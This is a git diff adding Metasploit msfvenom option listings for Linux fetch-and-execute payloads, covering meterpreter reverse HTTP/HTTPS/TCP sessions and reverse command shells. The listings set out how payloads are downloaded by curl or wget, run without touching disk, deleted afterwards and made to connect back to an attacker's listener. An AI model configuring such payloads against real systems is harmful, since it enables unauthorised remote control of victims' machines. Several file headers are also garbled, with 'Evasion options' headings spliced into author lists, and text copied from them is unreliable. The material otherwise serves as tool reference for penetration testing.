HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..76ff2b4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/aarch64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/https/aarch64/meterpreter_reverse_https: +========================= + +pid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZquXiMMT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c89261c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ItvlIREHl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-shell-reverse_tcp.txt new file mode 100644 index 0000000..6c613ab --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-shell-reverse_tcp.txt @@ -0,0 +1,98 @@ + + Name: HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/aarch64/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pLWiexkO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + dup2 socket in x12, then execve. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..5d4ec4d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-aarch64-shell_reverse_tcp.txt @@ -0,0 +1,86 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/aarch64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EVPcQHOnBzNX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..d9edcc9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armbe/meterpreter_reverse_http: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CDNljsRYiS no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..045fcea --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-armbe-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/armbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/armbe/meterpreter_reverse_https: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + 